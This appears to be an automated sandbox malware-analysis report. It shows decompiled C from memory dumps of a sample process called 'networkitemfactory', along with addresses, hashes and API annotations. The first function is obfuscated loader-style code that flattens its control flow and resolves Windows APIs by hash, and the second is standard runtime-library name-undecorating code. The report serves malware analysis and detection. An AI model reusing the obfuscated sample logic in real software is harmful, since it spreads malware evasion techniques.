                                                                                                      						if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
                                                                                                      							goto L44;
                                                                                                      						} else {
                                                                                                      							_t26 = 0x37c7e221;
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						_t99 = _t26 - 0xdddee09;
                                                                                                      						if(_t99 > 0) {
                                                                                                      							__eflags = _t26 - 0x10271147;
                                                                                                      							if(_t26 == 0x10271147) {
                                                                                                      								_t35 =  *0x20bddc8;
                                                                                                      								_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
                                                                                                      								 *((intOrPtr*)(_t95 + 4)) = _t93;
                                                                                                      								__eflags = _t35;
                                                                                                      								if(_t35 == 0) {
                                                                                                      									_t35 = E020B3DD0(_t57, E020B3E70(0xbb51e2dc), 0x298e8809, _t95);
                                                                                                      									 *0x20bddc8 = _t35;
                                                                                                      								}
                                                                                                      								_t89 =  *_t35();
                                                                                                      								_t37 =  *0x20bdcf0;
                                                                                                      								__eflags = _t37;
                                                                                                      								if(_t37 == 0) {
                                                                                                      									_t37 = E020B3DD0(_t57, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t95);
                                                                                                      									 *0x20bdcf0 = _t37;
                                                                                                      								}
                                                                                                      								_t38 =  *_t37(_t89, 8, _t93);
                                                                                                      								 *_t95 = _t38;
                                                                                                      								__eflags = _t38;
                                                                                                      								if(_t38 == 0) {
                                                                                                      									goto L44;
                                                                                                      								} else {
                                                                                                      									_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                                                                                      									_t91 =  *_t58;
                                                                                                      									 *((intOrPtr*)(_t96 + 0x18)) = _t91;
                                                                                                      									_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
                                                                                                      									 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
                                                                                                      									_t26 = 0x10b81eb8;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								__eflags = _t26 - 0x10b81eb8;
                                                                                                      								if(_t26 != 0x10b81eb8) {
                                                                                                      									goto L8;
                                                                                                      								} else {
                                                                                                      									_t42 =  *0x20bdcc8;
                                                                                                      									__eflags = _t42;
                                                                                                      									if(_t42 == 0) {
                                                                                                      										_t42 = E020B3DD0(_t57, E020B3E70(0x60f9cb2), 0x91ee8387, _t95);
                                                                                                      										 *0x20bdcc8 = _t42;
                                                                                                      									}
                                                                                                      									_t60 =  *0x20be360; // 0x53b7e8
                                                                                                      									_t43 =  *_t42( *((intOrPtr*)(_t60 + 0x20)), 0, 0, _t96 + 0x14);
                                                                                                      									_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                                                                                      									asm("sbb eax, eax");
                                                                                                      									_t26 = ( ~_t43 & 0xfdfb6263) + 0x3def898;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						} else {
                                                                                                      							if(_t99 == 0) {
                                                                                                      								_t79 =  *0x20bdfc0; // 0x0
                                                                                                      								__eflags = _t79;
                                                                                                      								if(_t79 == 0) {
                                                                                                      									_t79 = E020B3DD0(_t57, E020B3E70(0x60f9cb2), 0x67562713, _t95);
                                                                                                      									 *0x20bdfc0 = _t79;
                                                                                                      								}
                                                                                                      								_t47 =  *0x20be360; // 0x53b7e8
                                                                                                      								_t48 =  *_t79( *((intOrPtr*)(_t47 + 0x1c)),  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
                                                                                                      								_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                                                                                      								asm("sbb eax, eax");
                                                                                                      								_t26 = ( ~_t48 & 0x005926d4) + 0x1e121c8a;
                                                                                                      								goto L2;
                                                                                                      							} else {
                                                                                                      								if(_t26 == 0x1da5afb) {
                                                                                                      									_t53 =  *0x20be0f0;
                                                                                                      									_t94 =  *_t95;
                                                                                                      									__eflags = _t53;
                                                                                                      									if(_t53 == 0) {
                                                                                                      										_t53 = E020B3DD0(_t57, E020B3E70(0xe60124ba), 0x5006b8db, _t95);
                                                                                                      										 *0x20be0f0 = _t53;
                                                                                                      									}
                                                                                                      									 *_t53(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
                                                                                                      									_t58 =  *((intOrPtr*)(_t96 + 0x1c));
                                                                                                      									_t96 = _t96 + 0xc;
                                                                                                      									_t26 = 0xdddee09;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t26 == 0x3def898) {
                                                                                                      										__eflags = _t57;
                                                                                                      										if(_t57 == 0) {
                                                                                                      											E020B4180(_t57,  *_t95);
                                                                                                      										}
                                                                                                      										L44:
                                                                                                      										return _t57;
                                                                                                      									} else {
                                                                                                      										L8:
                                                                                                      										if(_t26 != 0x2c2c94ba) {
                                                                                                      											while(1) {
                                                                                                      												L2:
                                                                                                      												_t98 = _t26 - 0x11bb6a7c;
                                                                                                      												if(_t98 > 0) {
                                                                                                      													goto L29;
                                                                                                      												}
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      											goto L29;
                                                                                                      										} else {
                                                                                                      											return _t57;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					L45:
                                                                                                      					L29:
                                                                                                      					__eflags = _t26 - 0x2e352190;
                                                                                                      					if(__eflags > 0) {
                                                                                                      						__eflags = _t26 - 0x37c7e221;
                                                                                                      						if(_t26 != 0x37c7e221) {
                                                                                                      							goto L8;
                                                                                                      						} else {
                                                                                                      							_t26 = 0x10271147;
                                                                                                      							goto L2;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(__eflags == 0) {
                                                                                                      							_t26 = 0x11bb6a7c;
                                                                                                      							goto L2;
                                                                                                      						} else {
                                                                                                      							__eflags = _t26 - 0x1e121c8a;
                                                                                                      							if(_t26 == 0x1e121c8a) {
                                                                                                      								_t28 =  *0x20be14c;
                                                                                                      								__eflags = _t28;
                                                                                                      								if(_t28 == 0) {
                                                                                                      									_t28 = E020B3DD0(_t57, E020B3E70(0x60f9cb2), 0x8e956c76, _t95);
                                                                                                      									 *0x20be14c = _t28;
                                                                                                      								}
                                                                                                      								 *_t28( *((intOrPtr*)(_t96 + 0x14)));
                                                                                                      								_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                                                                                      								_t26 = 0x3def898;
                                                                                                      								goto L2;
                                                                                                      							} else {
                                                                                                      								__eflags = _t26 - 0x1e6b435e;
                                                                                                      								if(_t26 != 0x1e6b435e) {
                                                                                                      									goto L8;
                                                                                                      								} else {
                                                                                                      									_t31 =  *0x20bdd90; // 0x0
                                                                                                      									__eflags = _t31;
                                                                                                      									if(_t31 == 0) {
                                                                                                      										_t31 = E020B3DD0(_t57, E020B3E70(0x60f9cb2), 0x8705ea, _t95);
                                                                                                      										 *0x20bdd90 = _t31;
                                                                                                      									}
                                                                                                      									_t71 =  *0x20be360; // 0x53b7e8
                                                                                                      									_t32 =  *_t31( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *((intOrPtr*)(_t71 + 0x40)), 0, 0);
                                                                                                      									_t58 =  *((intOrPtr*)(_t96 + 0x10));
                                                                                                      									__eflags = _t32;
                                                                                                      									_t26 = 0x1e121c8a;
                                                                                                      									_t57 =  !=  ? 1 : _t57;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L45;
                                                                                                      				}
                                                                                                      			}































                                                                                                      0x020b1f60
                                                                                                      0x020b1f67
                                                                                                      0x020b1f6b
                                                                                                      0x020b1f6d
                                                                                                      0x020b1f71
                                                                                                      0x020b1f73
                                                                                                      0x020b1f78
                                                                                                      0x020b1f78
                                                                                                      0x020b1f78
                                                                                                      0x020b1f8b
                                                                                                      0x020b1f8b
                                                                                                      0x020b2141
                                                                                                      0x020b2145
                                                                                                      0x00000000
                                                                                                      0x020b214b
                                                                                                      0x020b214b
                                                                                                      0x00000000
                                                                                                      0x020b214b
                                                                                                      0x020b1f91
                                                                                                      0x020b1f91
                                                                                                      0x020b1f96
                                                                                                      0x020b2059
                                                                                                      0x020b205e
                                                                                                      0x020b20bd
                                                                                                      0x020b20c2
                                                                                                      0x020b20c5
                                                                                                      0x020b20c8
                                                                                                      0x020b20ca
                                                                                                      0x020b20dd
                                                                                                      0x020b20e2
                                                                                                      0x020b20e2
                                                                                                      0x020b20e9
                                                                                                      0x020b20eb
                                                                                                      0x020b20f0
                                                                                                      0x020b20f2
                                                                                                      0x020b2105
                                                                                                      0x020b210a
                                                                                                      0x020b210a
                                                                                                      0x020b2113
                                                                                                      0x020b2115
                                                                                                      0x020b2118
                                                                                                      0x020b211a
                                                                                                      0x00000000
                                                                                                      0x020b2120
                                                                                                      0x020b2120
                                                                                                      0x020b2124
                                                                                                      0x020b2129
                                                                                                      0x020b212d
                                                                                                      0x020b2133
                                                                                                      0x020b2137
                                                                                                      0x00000000
                                                                                                      0x020b2137
                                                                                                      0x020b2060
                                                                                                      0x020b2060
                                                                                                      0x020b2065
                                                                                                      0x00000000
                                                                                                      0x020b206b
                                                                                                      0x020b206b
                                                                                                      0x020b2070
                                                                                                      0x020b2072
                                                                                                      0x020b2085
                                                                                                      0x020b208a
                                                                                                      0x020b208a
                                                                                                      0x020b2094
                                                                                                      0x020b20a1
                                                                                                      0x020b20a3
                                                                                                      0x020b20a9
                                                                                                      0x020b20b0
                                                                                                      0x00000000
                                                                                                      0x020b20b0
                                                                                                      0x020b2065
                                                                                                      0x020b1f9c
                                                                                                      0x020b1f9c
                                                                                                      0x020b2001
                                                                                                      0x020b2007
                                                                                                      0x020b2009
                                                                                                      0x020b2021
                                                                                                      0x020b2023
                                                                                                      0x020b2023
                                                                                                      0x020b2029
                                                                                                      0x020b2040
                                                                                                      0x020b2042
                                                                                                      0x020b2048
                                                                                                      0x020b204f
                                                                                                      0x00000000
                                                                                                      0x020b1f9e
                                                                                                      0x020b1fa3
                                                                                                      0x020b1fc1
                                                                                                      0x020b1fc6
                                                                                                      0x020b1fc9
                                                                                                      0x020b1fcb
                                                                                                      0x020b1fde
                                                                                                      0x020b1fe3
                                                                                                      0x020b1fe3
                                                                                                      0x020b1fee
                                                                                                      0x020b1ff0
                                                                                                      0x020b1ff4
                                                                                                      0x020b1ff7
                                                                                                      0x00000000
                                                                                                      0x020b1fa5
                                                                                                      0x020b1faa
                                                                                                      0x020b2221
                                                                                                      0x020b2223
                                                                                                      0x020b2228
                                                                                                      0x020b2228
                                                                                                      0x020b2230
                                                                                                      0x020b2236
                                                                                                      0x020b1fb0
                                                                                                      0x020b1fb0
                                                                                                      0x020b1fb5
                                                                                                      0x020b1f80
                                                                                                      0x020b1f80
                                                                                                      0x020b1f80
                                                                                                      0x020b1f85
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b1f85
                                                                                                      0x00000000
                                                                                                      0x020b1fba
                                                                                                      0x020b1fc0
                                                                                                      0x020b1fc0
                                                                                                      0x020b1fb5
                                                                                                      0x020b1faa
                                                                                                      0x020b1fa3
                                                                                                      0x020b1f9c
                                                                                                      0x020b1f96
                                                                                                      0x00000000
                                                                                                      0x020b2155
                                                                                                      0x020b2155
                                                                                                      0x020b215a
                                                                                                      0x020b220c
                                                                                                      0x020b2211
                                                                                                      0x00000000
                                                                                                      0x020b2217
                                                                                                      0x020b2217
                                                                                                      0x00000000
                                                                                                      0x020b2217
                                                                                                      0x020b2160
                                                                                                      0x020b2160
                                                                                                      0x020b2202
                                                                                                      0x00000000
                                                                                                      0x020b2166
                                                                                                      0x020b2166
                                                                                                      0x020b216b
                                                                                                      0x020b21ca
                                                                                                      0x020b21cf
                                                                                                      0x020b21d1
                                                                                                      0x020b21e4
                                                                                                      0x020b21e9
                                                                                                      0x020b21e9
                                                                                                      0x020b21f2
                                                                                                      0x020b21f4
                                                                                                      0x020b21f8
                                                                                                      0x00000000
                                                                                                      0x020b216d
                                                                                                      0x020b216d
                                                                                                      0x020b2172
                                                                                                      0x00000000
                                                                                                      0x020b2178
                                                                                                      0x020b2178
                                                                                                      0x020b217d
                                                                                                      0x020b217f
                                                                                                      0x020b2192
                                                                                                      0x020b2197
                                                                                                      0x020b2197
                                                                                                      0x020b219c
                                                                                                      0x020b21b0
                                                                                                      0x020b21b2
                                                                                                      0x020b21b6
                                                                                                      0x020b21bd
                                                                                                      0x020b21c2
                                                                                                      0x00000000
                                                                                                      0x020b21c2
                                                                                                      0x020b2172
                                                                                                      0x020b216b
                                                                                                      0x020b2160
                                                                                                      0x00000000
                                                                                                      0x020b215a

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22cb2e24a4e3ed94fb0825836ebd1f66f5a4d13b085726ca253514443c85870f
                                                                                                      • Instruction ID: 9909ffb63bd7afbabbde40162a4f44022112dffd3c3db0fd0c1b9a6f0729f2de
                                                                                                      • Opcode Fuzzy Hash: 22cb2e24a4e3ed94fb0825836ebd1f66f5a4d13b085726ca253514443c85870f
                                                                                                      • Instruction Fuzzy Hash: F061CC30B043069FCB379F649894AEAB6E2FF84204F644929E919DB390DB35DC11EB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 71%
                                                                                                      			E0040BA7D(void* __edx, signed int* _a4) {
                                                                                                      				signed int _v8;
                                                                                                      				char _v16;
                                                                                                      				char _v24;
                                                                                                      				char _v122;
                                                                                                      				char _v123;
                                                                                                      				char _v124;
                                                                                                      				char _v128;
                                                                                                      				char _v132;
                                                                                                      				signed int _v136;
                                                                                                      				signed int _v140;
                                                                                                      				char _v148;
                                                                                                      				char _v156;
                                                                                                      				char _v164;
                                                                                                      				char _v172;
                                                                                                      				char _v180;
                                                                                                      				char _v188;
                                                                                                      				char _v196;
                                                                                                      				char _v204;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t53;
                                                                                                      				intOrPtr* _t55;
                                                                                                      				char* _t56;
                                                                                                      				void* _t87;
                                                                                                      				void* _t101;
                                                                                                      				char _t110;
                                                                                                      				intOrPtr _t116;
                                                                                                      				char* _t133;
                                                                                                      				intOrPtr _t151;
                                                                                                      				signed int* _t152;
                                                                                                      				signed int _t153;
                                                                                                      				void* _t156;
                                                                                                      
                                                                                                      				_t150 = __edx;
                                                                                                      				_t53 =  *0x435040; // 0x35ed344a
                                                                                                      				_v8 = _t53 ^ _t153;
                                                                                                      				_t55 =  *0x4376d4; // 0x0
                                                                                                      				_t152 = _a4;
                                                                                                      				_t116 =  *_t55;
                                                                                                      				_t56 = _t55 + 1;
                                                                                                      				_t151 = _t116;
                                                                                                      				 *0x4376d4 = _t56;
                                                                                                      				_t156 = _t151 - 0x45;
                                                                                                      				if(_t156 > 0) {
                                                                                                      					if(_t151 <= 0x4a) {
                                                                                                      						E00406FCF( &_v132, 0x7b);
                                                                                                      						if(_t116 <= 2) {
                                                                                                      							E004076FC( &_v132, E0040980B(__edx,  &_v180));
                                                                                                      							E0040773F( &_v132, 0x2c);
                                                                                                      						}
                                                                                                      						_t151 = _t151 - 0x46;
                                                                                                      						if(_t151 == 0) {
                                                                                                      							L48:
                                                                                                      							E004076FC( &_v132, E0040B56E(_t150,  &_v172));
                                                                                                      							E0040773F( &_v132, 0x2c);
                                                                                                      							goto L49;
                                                                                                      						} else {
                                                                                                      							_t151 = _t151 - 1;
                                                                                                      							if(_t151 == 0) {
                                                                                                      								L47:
                                                                                                      								E004076FC( &_v132, E0040B56E(_t150,  &_v156));
                                                                                                      								E0040773F( &_v132, 0x2c);
                                                                                                      								goto L48;
                                                                                                      							} else {
                                                                                                      								_t151 = _t151 - 1;
                                                                                                      								if(_t151 == 0) {
                                                                                                      									L49:
                                                                                                      									E004076FC( &_v132, E0040B56E(_t150,  &_v188));
                                                                                                      								} else {
                                                                                                      									_t151 = _t151 - 1;
                                                                                                      									if(_t151 == 0) {
                                                                                                      										goto L48;
                                                                                                      									} else {
                                                                                                      										if(_t151 == 0) {
                                                                                                      											goto L47;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						E00407674( &_v132, _t152, 0x7d);
                                                                                                      					} else {
                                                                                                      						if(_t151 == 0x51) {
                                                                                                      							goto L7;
                                                                                                      						} else {
                                                                                                      							if(_t151 == 0x52) {
                                                                                                      								L34:
                                                                                                      								E0040C696(_t150,  &_v140, 0, 0);
                                                                                                      								E0040B56E(_t150,  &_v132);
                                                                                                      								 *_t152 = _v140;
                                                                                                      								_t152[1] = _v136;
                                                                                                      							} else {
                                                                                                      								if(_t151 == 0x53) {
                                                                                                      									 *_t152 =  *_t152 & 0x00000000;
                                                                                                      									_t152[1] = 0;
                                                                                                      									_t152[1] = _t152[1] & 0xffff00ff;
                                                                                                      								} else {
                                                                                                      									if(_t151 != 0x54) {
                                                                                                      										goto L13;
                                                                                                      									} else {
                                                                                                      										goto L34;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					if(_t156 == 0) {
                                                                                                      						E0040980B(__edx, _t152);
                                                                                                      						goto L25;
                                                                                                      					} else {
                                                                                                      						_t151 = _t151;
                                                                                                      						if(_t151 == 0) {
                                                                                                      							 *0x4376d4 = _t56 - 1;
                                                                                                      							goto L27;
                                                                                                      						} else {
                                                                                                      							_t151 = _t151 - 0x30;
                                                                                                      							if(_t151 == 0) {
                                                                                                      								E0040B56E(__edx, _t152);
                                                                                                      								L25:
                                                                                                      							} else {
                                                                                                      								_t151 = _t151 - 1;
                                                                                                      								if(_t151 == 0) {
                                                                                                      									if( *_t56 != 0x40) {
                                                                                                      										_push(E0040980B(__edx,  &_v204));
                                                                                                      										_push(_t152);
                                                                                                      										_t101 = E00407048( &_v148, "&");
                                                                                                      										goto L19;
                                                                                                      									} else {
                                                                                                      										 *0x4376d4 = _t56 + 1;
                                                                                                      										_push("NULL");
                                                                                                      										goto L22;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									_t151 = _t151 - 1;
                                                                                                      									if(_t151 == 0) {
                                                                                                      										E0040B56E(__edx,  &_v132);
                                                                                                      										E0040B56E(__edx,  &_v140);
                                                                                                      										if(_v128 > 1 || _v136 > 1) {
                                                                                                      											L27:
                                                                                                      											_push(1);
                                                                                                      											goto L14;
                                                                                                      										} else {
                                                                                                      											if(E0040B5E8( &_v132,  &_v123, 0x64) != 0) {
                                                                                                      												_t110 = _v123;
                                                                                                      												_v124 = _t110;
                                                                                                      												if(_t110 != 0x2d) {
                                                                                                      													_v123 = 0x2e;
                                                                                                      												} else {
                                                                                                      													_v123 = _v122;
                                                                                                      													_v122 = 0x2e;
                                                                                                      												}
                                                                                                      												_push( &_v140);
                                                                                                      												_push(_t152);
                                                                                                      												_t101 = E00407674(E00407048( &_v196,  &_v124),  &_v164, 0x65);
                                                                                                      												L19:
                                                                                                      												E00407652(_t101);
                                                                                                      											} else {
                                                                                                      												goto L13;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t151 != 0) {
                                                                                                      											L13:
                                                                                                      											_push(2);
                                                                                                      											L14:
                                                                                                      											E00407082(_t152);
                                                                                                      										} else {
                                                                                                      											L7:
                                                                                                      											E0040B56E(_t150,  &_v132);
                                                                                                      											if(( *0x4376e4 & 0x00004000) == 0) {
                                                                                                      												L36:
                                                                                                      												_t133 =  &_v16;
                                                                                                      												_push( &_v132);
                                                                                                      												_push( &_v140);
                                                                                                      												if(_t116 != 0x44) {
                                                                                                      													_push("`non-type-template-parameter");
                                                                                                      												} else {
                                                                                                      													_push("`template-parameter");
                                                                                                      												}
                                                                                                      												E00407652(E00407048(_t133));
                                                                                                      												E004076B8( &_v140, _t152, "\'");
                                                                                                      											} else {
                                                                                                      												E0040B5E8( &_v132,  &_v24, 0x10);
                                                                                                      												_t87 =  *0x4376ec(E0040F7EF( &_v24));
                                                                                                      												if(_t87 == 0) {
                                                                                                      													goto L36;
                                                                                                      												} else {
                                                                                                      													_push(_t87);
                                                                                                      													L22:
                                                                                                      													E00407048(_t152);
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      				return E004023FF(_t116, _v8 ^ _t153, _t150, _t151, _t152);
                                                                                                      			}




































                                                                                                      0x0040ba7d
                                                                                                      0x0040ba86
                                                                                                      0x0040ba8d
                                                                                                      0x0040ba90
                                                                                                      0x0040ba97
                                                                                                      0x0040ba9a
                                                                                                      0x0040ba9c
                                                                                                      0x0040ba9e
                                                                                                      0x0040baa1
                                                                                                      0x0040baa6
                                                                                                      0x0040baa9
                                                                                                      0x0040bc1e
                                                                                                      0x0040bccb
                                                                                                      0x0040bcd6
                                                                                                      0x0040bce9
                                                                                                      0x0040bcf3
                                                                                                      0x0040bcf3
                                                                                                      0x0040bcf8
                                                                                                      0x0040bcfb
                                                                                                      0x0040bd29
                                                                                                      0x0040bd3a
                                                                                                      0x0040bd44
                                                                                                      0x00000000
                                                                                                      0x0040bcfd
                                                                                                      0x0040bcfd
                                                                                                      0x0040bcfe
                                                                                                      0x0040bd09
                                                                                                      0x0040bd1a
                                                                                                      0x0040bd24
                                                                                                      0x00000000
                                                                                                      0x0040bd00
                                                                                                      0x0040bd00
                                                                                                      0x0040bd01
                                                                                                      0x0040bd49
                                                                                                      0x0040bd5a
                                                                                                      0x0040bd03
                                                                                                      0x0040bd03
                                                                                                      0x0040bd04
                                                                                                      0x00000000
                                                                                                      0x0040bd06
                                                                                                      0x0040bd07
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bd07
                                                                                                      0x0040bd04
                                                                                                      0x0040bd01
                                                                                                      0x0040bcfe
                                                                                                      0x0040bd65
                                                                                                      0x0040bc24
                                                                                                      0x0040bc27
                                                                                                      0x00000000
                                                                                                      0x0040bc2d
                                                                                                      0x0040bc30
                                                                                                      0x0040bc40
                                                                                                      0x0040bc4b
                                                                                                      0x0040bc54
                                                                                                      0x0040bc62
                                                                                                      0x0040bc6a
                                                                                                      0x0040bc32
                                                                                                      0x0040bc35
                                                                                                      0x0040bc72
                                                                                                      0x0040bc75
                                                                                                      0x0040bc79
                                                                                                      0x0040bc37
                                                                                                      0x0040bc3a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bc3a
                                                                                                      0x0040bc35
                                                                                                      0x0040bc30
                                                                                                      0x0040bc27
                                                                                                      0x0040baaf
                                                                                                      0x0040baaf
                                                                                                      0x0040bc14
                                                                                                      0x00000000
                                                                                                      0x0040bab5
                                                                                                      0x0040bab5
                                                                                                      0x0040bab8
                                                                                                      0x0040bc07
                                                                                                      0x00000000
                                                                                                      0x0040babe
                                                                                                      0x0040babe
                                                                                                      0x0040bac1
                                                                                                      0x0040bbfb
                                                                                                      0x0040bc00
                                                                                                      0x0040bac7
                                                                                                      0x0040bac7
                                                                                                      0x0040bac8
                                                                                                      0x0040bbc0
                                                                                                      0x0040bbe6
                                                                                                      0x0040bbe7
                                                                                                      0x0040bbf3
                                                                                                      0x00000000
                                                                                                      0x0040bbc2
                                                                                                      0x0040bbc3
                                                                                                      0x0040bbc8
                                                                                                      0x00000000
                                                                                                      0x0040bbc8
                                                                                                      0x0040bace
                                                                                                      0x0040bace
                                                                                                      0x0040bacf
                                                                                                      0x0040bb26
                                                                                                      0x0040bb32
                                                                                                      0x0040bb3d
                                                                                                      0x0040bc0c
                                                                                                      0x0040bc0c
                                                                                                      0x00000000
                                                                                                      0x0040bb50
                                                                                                      0x0040bb60
                                                                                                      0x0040bb70
                                                                                                      0x0040bb73
                                                                                                      0x0040bb78
                                                                                                      0x0040bb86
                                                                                                      0x0040bb7a
                                                                                                      0x0040bb7d
                                                                                                      0x0040bb80
                                                                                                      0x0040bb80
                                                                                                      0x0040bb90
                                                                                                      0x0040bb91
                                                                                                      0x0040bbac
                                                                                                      0x0040bbb1
                                                                                                      0x0040bbb3
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bb60
                                                                                                      0x0040bad1
                                                                                                      0x0040bad4
                                                                                                      0x0040bb62
                                                                                                      0x0040bb62
                                                                                                      0x0040bb64
                                                                                                      0x0040bb66
                                                                                                      0x0040bada
                                                                                                      0x0040bada
                                                                                                      0x0040bade
                                                                                                      0x0040baee
                                                                                                      0x0040bc85
                                                                                                      0x0040bc88
                                                                                                      0x0040bc8b
                                                                                                      0x0040bc92
                                                                                                      0x0040bc96
                                                                                                      0x0040bcbf
                                                                                                      0x0040bc98
                                                                                                      0x0040bc98
                                                                                                      0x0040bc98
                                                                                                      0x0040bca4
                                                                                                      0x0040bcb5
                                                                                                      0x0040baf4
                                                                                                      0x0040bafd
                                                                                                      0x0040bb0c
                                                                                                      0x0040bb16
                                                                                                      0x00000000
                                                                                                      0x0040bb1c
                                                                                                      0x0040bb1c
                                                                                                      0x0040bbcd
                                                                                                      0x0040bbcf
                                                                                                      0x0040bbcf
                                                                                                      0x0040bb16
                                                                                                      0x0040baee
                                                                                                      0x0040bad4
                                                                                                      0x0040bacf
                                                                                                      0x0040bac8
                                                                                                      0x0040bac1
                                                                                                      0x0040bab8
                                                                                                      0x0040baaf
                                                                                                      0x0040bd7c

                                                                                                      APIs
                                                                                                      • DName::getString.LIBCMT ref: 0040BAFD
                                                                                                        • Part of subcall function 0040B5E8: _HeapManager::getMemory.LIBCMT ref: 0040B60B
                                                                                                        • Part of subcall function 0040F7EF: __wcstoi64.LIBCMT ref: 0040F7F9
                                                                                                      • DName::DName.LIBCMT ref: 0040BCCB
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BCDF
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BCE9
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BCF3
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD10
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD1A
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD24
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BADE
                                                                                                        • Part of subcall function 0040B56E: DName::DName.LIBCMT ref: 0040B583
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BB26
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BB32
                                                                                                      • DName::getString.LIBCMT ref: 0040BB59
                                                                                                      • DName::DName.LIBCMT ref: 0040BB66
                                                                                                      • DName::DName.LIBCMT ref: 0040BBA5
                                                                                                      • DName::operator+.LIBCMT ref: 0040BBAC
                                                                                                      • DName::operator+.LIBCMT ref: 0040BBB3
                                                                                                      • DName::DName.LIBCMT ref: 0040BBCF
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BBE0
                                                                                                      • DName::DName.LIBCMT ref: 0040BBF3
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BBFB
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BC14
                                                                                                      • UnDecorator::getZName.LIBCMT ref: 0040BC4B
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BC54
                                                                                                      • DName::DName.LIBCMT ref: 0040BC9D
                                                                                                      • DName::operator+.LIBCMT ref: 0040BCA4
                                                                                                      • DName::operator+.LIBCMT ref: 0040BCB5
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD30
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD3A
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD44
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD50
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD5A
                                                                                                      • DName::operator+.LIBCMT ref: 0040BD65
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::get$Name$DimensionSigned$Name::Name::operator+=$Name::operator+$Decorated$Name::getString$HeapManager::getMemory__wcstoi64
                                                                                                      • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                      • API String ID: 794994914-3945972591
                                                                                                      • Opcode ID: 1c2fea9a4649ad5569de1717745718e8fbf6f0c4d96ecaba2659b31418f3cf6a
